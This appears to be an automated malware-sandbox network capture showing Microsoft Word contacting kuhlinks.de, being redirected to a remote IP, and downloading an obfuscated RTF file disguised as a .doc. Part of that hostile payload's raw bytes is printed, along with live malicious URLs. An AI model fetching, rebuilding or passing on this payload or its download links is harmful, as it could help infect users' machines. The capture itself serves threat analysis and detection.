Apr 2, 2025 11:55:39.402302027 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.402324915 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.402335882 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.402354002 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.402362108 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.402405977 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.403162956 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.403177023 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.403208017 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.403220892 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.403228998 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.403249025 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.403279066 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.403294086 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.403315067 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.403332949 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.403346062 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.620249033 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.620280027 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.620353937 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.620843887 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.620857954 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.620896101 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.620910883 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.620924950 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.620944977 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.620968103 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.620975018 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.620987892 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.621007919 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.621041059 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.621054888 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.621068001 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.621082067 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.621105909 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.621125937 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.840369940 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.840395927 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.840459108 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.840476036 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.841094971 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.841137886 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.841207981 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.841254950 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.841294050 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.841309071 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.841322899 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.841346979 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.841361046 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.841372013 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.841398954 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.841423035 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.841435909 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.841449976 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.841459036 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.841476917 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.841505051 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.058458090 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.058482885 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.058562040 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.058790922 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.058922052 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.059279919 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.059299946 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.059314966 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.059324980 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.059345961 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.059360027 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.059364080 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.059377909 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.059398890 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.059416056 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.059703112 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.059760094 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.059781075 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:40.059802055 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.059842110 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:40.421107054 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:40.421139956 CEST	443	49694	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:40.421210051 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:40.421530962 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:40.421540976 CEST	443	49694	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:40.624542952 CEST	443	49694	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:40.624602079 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:40.625186920 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:40.625200033 CEST	443	49694	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:40.625415087 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:40.625422955 CEST	443	49694	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:41.214850903 CEST	443	49694	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:41.214926004 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:41.214941978 CEST	443	49694	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:41.214958906 CEST	443	49694	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:41.215003014 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:41.215003014 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:41.215044975 CEST	49694	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:41.215061903 CEST	443	49694	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:41.216350079 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:41.433209896 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:41.433268070 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:42.097450972 CEST	80	49687	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:42.097528934 CEST	49687	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:42.097529888 CEST	49687	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:42.345577955 CEST	80	49687	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:46.482539892 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:46.482599020 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:57:20.190737009 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:57:20.674851894 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:57:21.628058910 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:57:23.534238100 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:57:27.346754074 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:57:34.956119061 CEST	49692	80	192.168.2.7	216.9.224.185

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 2, 2025 11:55:33.764070034 CEST	63565	53	192.168.2.7	1.1.1.1
Apr 2, 2025 11:55:34.047276020 CEST	53	63565	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 2, 2025 11:55:33.764070034 CEST	192.168.2.7	1.1.1.1	0xac74	Standard query (0)	kuhlinks.de	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 2, 2025 11:55:33.409758091 CEST	1.1.1.1	192.168.2.7	0xa08a	No error (0)	ecs-office.s-0005.dual-s-msedge.net	s-0005.dual-s-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 2, 2025 11:55:33.409758091 CEST	1.1.1.1	192.168.2.7	0xa08a	No error (0)	s-0005.dual-s-msedge.net		52.123.128.14	A (IP address)	IN (0x0001)	false
Apr 2, 2025 11:55:33.409758091 CEST	1.1.1.1	192.168.2.7	0xa08a	No error (0)	s-0005.dual-s-msedge.net		52.123.129.14	A (IP address)	IN (0x0001)	false
Apr 2, 2025 11:55:34.047276020 CEST	1.1.1.1	192.168.2.7	0xac74	No error (0)	kuhlinks.de		104.21.47.51	A (IP address)	IN (0x0001)	false
Apr 2, 2025 11:55:34.047276020 CEST	1.1.1.1	192.168.2.7	0xac74	No error (0)	kuhlinks.de		172.67.144.140	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

kuhlinks.de

216.9.224.185

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49687	216.9.224.185	80	6820	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Apr 2, 2025 11:55:36.823698044 CEST	454	OUT	HEAD /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2 X-IDCRL_ACCEPTED: t Host: 216.9.224.185
Apr 2, 2025 11:55:37.044899940 CEST	323	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 09:55:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT ETag: "198aa-631c505d8feaa" Accept-Ranges: bytes Content-Length: 104618 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49692	216.9.224.185	80	6820	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Apr 2, 2025 11:55:38.086529016 CEST	319	OUT	GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: 216.9.224.185
Apr 2, 2025 11:55:38.307533026 CEST	1254	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 09:55:38 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT ETag: "198aa-631c505d8feaa" Accept-Ranges: bytes Content-Length: 104618 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 09 09 7b 5c 2a 5c 64 67 6d 4e 6f 64 65 4b 69 6e 64 38 34 34 31 33 39 33 39 32 20 5c 2d 7d 0d 7b 5c 32 39 37 36 35 30 35 31 31 2f 25 2c 3c 36 3e 32 a7 3a 2f 7e 3f 39 b0 7e 39 5f 40 25 2a 39 3d b5 40 24 7c 34 5d 28 31 3c 3a 35 31 28 39 3f 26 27 3f 2e 5b 23 2c 35 34 32 2e 2a 5f 25 25 39 37 7e 3f 3d 2d 2f 35 30 27 35 3f 2c 27 40 2f 24 3c 37 3b 31 30 2f 25 35 40 21 27 3f 40 2f 60 40 3f a7 3d 3f 5e 2b 3d 35 30 7e 3f 5e 3e 2a 23 30 2a 3f 5d 2d 3b 25 3f 5b 27 2f b0 2a 39 38 32 39 5e 25 b0 2f 33 2d b5 33 b0 3f 31 29 26 31 5e 30 28 5e 7c 2f 35 b0 28 b0 3e 5f 28 5d 28 5e 29 3b 40 3c 3f 25 7e 25 26 28 2f 3f 31 b0 2e 3c 37 2c 3f 3e 39 39 3d 3f 21 32 3a 36 25 34 2e 2d 23 5d 3d 7e a7 b0 40 b5 5d 2f 2f 3a b0 2f 3f 5d 24 2a 3b 3d 28 b0 3d 35 2a a7 39 3a 24 5f 5d 32 3c 3c 35 24 38 3c 3b 5e 2b 25 b0 34 3c 3f 3f 33 29 3f 39 21 5d 32 60 3e 2a 33 35 3a 60 40 3a 39 36 2c 3f b5 29 3b 23 3f 33 5f b5 3f 2e 5b 25 31 27 3f 5f 27 a7 25 36 3f 29 25 25 33 34 3f b0 3f 29 3e 3f 60 25 3d 27 28 2f 3f b0 5e [TRUNCATED] Data Ascii: {\rtf1{\\dgmNodeKind844139392 \-}{\297650511/%,<6>2:/~?9~9_@%9=@$\|4](1<:51(9?&'?.[#,542._%%97~?=-/50'5?,'@/$<7;10/%5@!'?@/`@?=?^+=50~?^>#0?]-;%?['/9829^%/3-3?1)&1^0(^\|/5(>_(](^);@<?%~%&(/?1.<7,?>99=?!2:6%4.-#]=~@]//:/?]$;=(=59:$_]2<<5$8<;^+%4<??3)?9!]2`>35:`@:96,?);#?3_?.[%1'?_'%6?)%%34??)>?`%='(/?^`#]63;?3%``4?4-;?%,02]`)?`7?[1!92$?-4^('&?%?@;9818[\|/?=[5@3.##?,7^#-4></%#?7&!3-?.7>%5`+@4;5%,@->;'$;7)\|~)#(?~\|8(_/??-?@?'79_8?$?=0,^^%4~?0]^\|%]\|]!=;$2%<8&<.2:1`0?]$?)@9)4.%2)`.<51%$\|78?9-39[?=0#[?7:%&0:?,26?&~@#6[9522=+@,%'8;=829)/?[[?-??&?3(:=_83.1,>`[>[5$7%~)]@]#-,=''42_(!'!%7'%53+0/??0,?//3;/3??:0)1<.~!42$1.?)$\|>/8=<77+7%='?.1?2!.$%\|.94?%]6/#?`3^08%%%?//#343:]=%0%45$26=4+^%&=~?+:_?#$?+?5@!0<!(?)/5+&'>2'-`>?@#_;@??.:0;&->>%+06-0)((@&?``$~+?~,<0'=//`$:?3?~%<%-.?];[5,8.?/??%(%3]98()649!<%!=7?[$#*96?@@?25?&([%%17_[?#'?'!%9@0%,$2^1-?`.[)_&
Apr 2, 2025 11:55:38.307549953 CEST	1254	IN	Data Raw: 2b 33 30 b0 2a 3f 3f 3e 40 5e 5e 38 3e 3a 28 2f 5d 2e 3d 3e 36 24 34 b5 29 21 25 27 5b 2a 3a 3e 3f 23 3f 27 5d 32 37 2f 3b 39 a7 3f 3f 60 a7 3f 3d 3f 37 27 30 b0 3f 3e 29 25 23 5d 28 5b 33 3d 33 3f 5f 33 5e 40 b0 b0 2a a7 25 21 30 29 3f 3c a7 b5 Data Ascii: +30??>@^^8>:(/].=>6$4)!%'[:>?#?']27/;9??`?=?7'0?>)%#]([3=3?_3^@%!0)?<@+<??((=#4<57/@@6:~:$$:1'`=)@?1?7\|2$[)1>_2?):\|#?9%](?3%_9]^1?=15?'.&[+/5??:976)\|!7%?;?<]6$>&=?$?.?_-~9@1.2```.?':2;8_!^8'-+64[:[2?+-?.!)0;0/@[???].'[*
Apr 2, 2025 11:55:38.307816029 CEST	1254	IN	Data Raw: 38 2f 29 b5 b0 5b 2f 3b 3f 3f 37 b0 2a 3b 38 5f 5b 5b 7e 3d 2f 3f 60 34 29 35 3f 38 31 3d 30 5f 3b 3c 3f 29 7c 5f b0 30 27 27 2e 24 2a 2c 40 3c 36 39 2c 3d 29 2c 3e 3a 40 3f 29 26 5f 40 7c 34 7c 24 3c 38 38 37 3f 5d 39 38 40 25 38 5e 38 2d 27 3f Data Ascii: 8/)[/;??7;8_[[~=/?`4)5?81=0_;<?)\|_0''.$,@<69,=),>:@?)&_@\|4\|$<887?]98@%8^8-'??\|<<?~+&)?)??]%:?-?%&(.^5:&8^'4?,'`;&?,+,.-;?&^/9?^(?&??>(140#$';??)-8[0-.=.:8[%;0%?13%8`?'=-)#'-4<#93`<-[:0,_8791$30],`<?%+\|59,44!?+?.,?-2%'0386
Apr 2, 2025 11:55:38.307827950 CEST	1254	IN	Data Raw: 20 32 09 20 09 20 20 09 09 09 09 20 20 20 20 20 09 20 30 0d 0d 0a 0d 0a 0d 0d 0d 0a 0d 0a 0d 0d 0a 0d 0d 0d 0a 0a 0d 0a 0d 30 30 30 09 09 09 09 09 20 20 09 20 20 09 09 20 09 09 20 30 30 20 09 20 20 09 09 20 09 20 20 20 09 09 09 09 20 30 09 09 09 Data Ascii: 2 0000 00 0 c0000 004b4f635 5
Apr 2, 2025 11:55:38.307868004 CEST	1254	IN	Data Raw: 09 20 09 20 20 20 09 09 09 09 20 09 20 09 30 0a 0d 0a 0d 0d 0d 0a 0d 0a 0d 0d 0a 0a 0a 0a 0a 0d 0d 0a 0d 0a 0d 30 0d 0a 0a 0d 0a 0a 0d 0a 0d 0a 0a 0a 0d 0d 0d 0d 0d 0d 0a 0d 0a 0d 33 09 20 09 09 20 20 20 20 09 20 20 09 20 09 20 09 65 09 09 09 09 Data Ascii: 003 e 000 300fef f090 0 06
Apr 2, 2025 11:55:38.307894945 CEST	1254	IN	Data Raw: 0d 66 0a 0d 0d 0d 0a 0a 0d 0d 0d 0d 0d 0a 0d 0d 0a 0d 0d 0a 0a 0d 0a 0d 66 66 66 66 66 66 66 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0d 0d 0d 0d 0a 0d 0d 0a 0a 0d 0a 0d 66 09 20 20 09 09 09 20 09 09 09 20 09 09 20 20 20 66 66 09 20 20 09 09 09 20 09 09 09 Data Ascii: fffffffff ff ff fffff ff ff ff
Apr 2, 2025 11:55:38.523999929 CEST	1254	IN	Data Raw: 20 09 20 20 09 09 09 20 20 20 09 09 09 66 09 09 09 20 20 09 20 09 09 09 20 20 20 09 09 09 66 66 0d 0a 0a 0a 0d 0a 0d 0d 0d 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0d 0a 0a 66 09 09 09 20 20 09 20 09 09 09 20 20 20 09 09 09 66 66 66 66 0a 0d 0a 0d 0d 0d 0a Data Ascii: f fff fffffffff ff f ffffffff
Apr 2, 2025 11:55:38.524025917 CEST	1254	IN	Data Raw: 66 0d 0a 0d 0a 0d 0a 0d 0a 0a 0a 0d 0d 0a 0d 0d 0d 0d 0a 0d 0a 0d 0a 66 66 0d 0a 0d 0a 0d 0a 0d 0a 0a 0a 0d 0d 0a 0d 0d 0d 0d 0a 0d 0a 0d 0a 66 66 66 66 0a 0d 0d 0a 0d 0a 0d 0a 0a 0a 0d 0d 0a 0d 0d 0d 0d 0a 0d 0a 0d 0a 66 0d 0d 0a 0a 0a 0a 0d 0a Data Ascii: ffffffffff ff ffff f ffffffff
Apr 2, 2025 11:55:38.524074078 CEST	1254	IN	Data Raw: 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 0a 66 0d 0d 0a 0d 0a 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0d 0a 0a 0a 0d 0a 0a 66 0d 0d 0d 0a 0a 0d 0a 0a 0a 0d 0a 0d 0a 0d 0a 0a 0a 0a 0a 0d 0a 0a 66 09 09 20 20 20 09 20 20 09 09 20 20 09 20 20 20 66 0a 0a 0d 0a 0a 0d Data Ascii: fff fffff fffffffff
Apr 2, 2025 11:55:38.524157047 CEST	1254	IN	Data Raw: 20 20 20 09 09 09 20 20 20 20 09 09 20 09 66 0a 0a 0a 0a 0d 0a 0a 0d 0d 0d 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0d 0a 66 0a 0a 0d 0a 0d 0a 0d 0d 0d 0d 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0d 0a 66 09 20 20 20 20 09 09 09 20 20 20 20 09 09 20 09 66 0a 0a 0d 0a Data Ascii: fff ff fffff ff f ffff fff
Apr 2, 2025 11:55:38.524171114 CEST	1254	IN	Data Raw: 09 09 66 66 66 66 66 66 66 0a 0a 0a 0a 0d 0a 0a 0d 0a 0a 0d 0a 0d 0a 0d 0d 0d 0d 0a 0d 0d 0d 66 66 20 20 20 20 09 09 09 09 20 09 09 20 20 09 09 09 66 09 09 09 09 09 20 09 20 09 20 20 20 20 09 09 09 66 09 20 20 09 09 20 09 20 09 20 20 20 20 09 09 Data Ascii: fffffffff f f f fffffff fffff ff
Apr 2, 2025 11:55:41.216350079 CEST	334	OUT	HEAD /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Connection: Keep-Alive Host: 216.9.224.185
Apr 2, 2025 11:55:41.433209896 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 09:55:41 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT ETag: "198aa-631c505d8feaa" Accept-Ranges: bytes Content-Length: 104618 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/msword

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49683	104.21.47.51	443	6820	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 09:55:34 UTC	324	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: kuhlinks.de
2025-04-02 09:55:34 UTC	1024	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 09:55:34 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cf-Ray: 929f738cecca4243-EWR Server: cloudflare Allow: GET,HEAD Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Cf-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85XXu5lfGbEDAMmra7BD0il18fVEOaTqcNDT%2F%2FKtSYDervEtu2kz%2FYSvVgV4A6WsTl6upiT9P22J6sfDLMfWMtCkjav9ZyKSncYQ%2FfzkowXe5oBdpA6U97cYf2IIdg%3D%3D"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=133362&min_rtt=131590&rtt_var=30423&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=938&delivery_rate=27201&cwnd=237&unsent_bytes=0&cid=96725445396d9611&ts=663&x=0"
2025-04-02 09:55:34 UTC	13	IN	Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a Data Ascii: 8GET,HEAD
2025-04-02 09:55:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49684	104.21.47.51	443	6820	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 09:55:35 UTC	227	OUT	OPTIONS / HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Protocol Discovery Host: kuhlinks.de Content-Length: 0 Connection: Keep-Alive
2025-04-02 09:55:35 UTC	1024	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 09:55:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cf-Ray: 929f73928b61efa9-EWR Server: cloudflare Allow: GET,HEAD Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Cf-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cscfj%2FfRLWGlgnkSaKYRni4g9DqimRvxQJBhfEAcqZkPl5RafRsy%2BNWcVBDUodr5mOngZyc%2FMfDh1SpsBOOEKlpU1Umi54Q73OcEl1W2Xs%2F9hrzxQlBGbTsNBYETeA%3D%3D"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=124976&min_rtt=114567&rtt_var=35123&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=841&delivery_rate=32502&cwnd=233&unsent_bytes=0&cid=045734ccf900fe35&ts=582&x=0"
2025-04-02 09:55:35 UTC	13	IN	Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a Data Ascii: 8GET,HEAD
2025-04-02 09:55:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49685	104.21.47.51	443	6820	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-04-02 09:55:36 UTC	310	OUT	HEAD /3ri5DVX HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2 X-IDCRL_ACCEPTED: t Host: kuhlinks.de
2025-04-02 09:55:36 UTC	1196	IN	HTTP/1.1 302 Found Date: Wed, 02 Apr 2025 09:55:36 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 192 Connection: close Cf-Ray: 929f73977d572ef5-EWR Location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Cf-Cache-Status: DYNAMIC Report-To: 